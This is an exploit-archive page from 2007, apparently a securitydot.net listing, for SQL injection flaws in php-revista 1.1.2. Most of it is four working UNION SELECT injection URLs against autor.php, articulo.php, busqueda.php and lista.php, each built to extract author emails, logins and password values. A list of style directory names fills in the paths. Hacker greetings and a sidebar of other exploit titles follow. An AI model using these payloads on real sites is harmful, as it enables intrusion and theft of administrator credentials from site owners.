exploits , vulnerabilities , articles , php-revista <= 1.1.2 Multiple Remote SQL Injection Vulnerabilities

2007-03-21

php-revista <= 1.1.2 Multiple Remote SQL Injection Vulnerabilities

Rated as : High Risk

php-revista <= 1.1.2  Remote SQL Injection Exploit

Found by & contact : Cold z3ro , cold-z3ro@hotmail.com

script :
http://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&big_mirror=0


Exploits :
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/autor.php?id_autor=-12 union
select null,email,login,pwd,null,null,null,null,null,null,null,null,null
from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/articulo.php?id_articulo=-12
union select
null,email,login,pwd,null,null,null,null,null,null,null,null,null from
autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/busqueda.php?cadena='+union
select null,email,login,pwd,null,null,null,null,null,null,null,null,null
from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/lista.php?email='+union select
null,email,login,pwd,null,null,null,null,null,null,null,null,null from
autores where id =1 /*
==============================================================================

Styles names :
/discreet/
/galveston/
/mergedidea/
/Widget_Factory/
/Digital_Multiplex/
==========================================================================================================================================
----  GreeTz: |MoHaNdKo|  |Cold One|  |Cold ThreE| |Viper Hacker| |The
Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
             |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke|
|Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
             |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C|
|Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
             |The Sniper| | DearMan | |Pro Hackers| | 020 | | abdulla00
" alz3eem" | | The_Viper |Kof2002|
             All i know
==========================================================================================================================================


Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

Print :  Team Hell
securitydot.net - 2007-03-21

Exploits - newest 10 RSS | More

2007-06-15 57271 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34201 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42423 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29329 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19769 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16706 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19404 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16593 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33606 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17231 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit